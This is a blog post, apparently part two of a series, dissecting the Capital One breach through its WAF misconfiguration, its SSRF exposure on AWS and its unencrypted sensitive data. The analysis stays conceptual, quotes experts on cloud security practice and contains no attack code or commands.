“That is a pretty egregious oversight.”
In the second part of our three part series on the Capital One breach, I want to discuss the vulnerabilities and other elements that went into the breach in an autopsy of the event. (Click here if you want to catch up on part one.) The evidence suggests that while some of the factors in the Capital One breach could be perceived as unique, the key elements that allowed the breach to occur are actually quite common.
The first and most obvious is the poor RBAC controls and password management on the WAF. For what it’s worth, the WAF misconfiguration and the underlying open AWS infrastructure that allowed SSRF is apparently a frequent find in penetration testing. According to Evan Johnson of Cloudflare, “SSRF is a bug hunters [sic] dream because it is an easy to perform attack and regularly yields critical findings.”
As Troy Hunt, Microsoft regional director and a data breach expert, said recently, “WAFs are great, but there should be an additional layer of security, and the underlying resources themselves need to be secure [encrypted]. For argument’s sake, if this was lack of authentication on a resource, and they were just relying on the WAF to keep people out, then that is a pretty egregious oversight.”
One should definitely question why this much sensitive data was kept unencrypted and for so long. Since the data was stored offsite (in the cloud) best practice would dictate that the SSNs and other sensitive data should be encrypted BEFORE even being sent there. If any keys needed to be shared, that policy should have been reviewed and well understood before any sensitive data went anywhere.
Regardless, once the firewall door is open (via misconfiguration), only an administrator with extensive experience with AWS configuration and architecture would be able to mitigate the issue on the cloud services side. While Capital One may not have had the extensive experience necessary to properly configure their AWS service to prevent unauthorized access, the alleged attacker definitely could have, from their time working at AWS. “There’s a lot of specialized knowledge that comes with operating a service within AWS, and to someone without specialized knowledge of AWS, [SSRF attacks are] not something that would show up on any critical configuration guide,” says Evan Johnson. “The problem is common and well-known, but hard to prevent and does not have any mitigations built in to the AWS platform … The impact of SSRF is being worsened by the offering of public clouds, and the major players like AWS are not doing anything to fix it.”
A HackerOne blog post explains how once an SSRF is discovered in Amazon EC2, you can often fairly easily gather metadata and other “information for you to understand the infrastructure and may reveal Amazon S3 access tokens, API tokens, and more.”
After hijacking the WAF and infiltrating the AWS servers, the exfiltration of the data was the easy part. Made all the easier by the flat architecture of the cloud data buckets, all feeding back through a single point of protection – and a single point of failure.
Now that we’ve covered the details of the vulnerabilities, in my next post I’ll cover what could have been done to address them.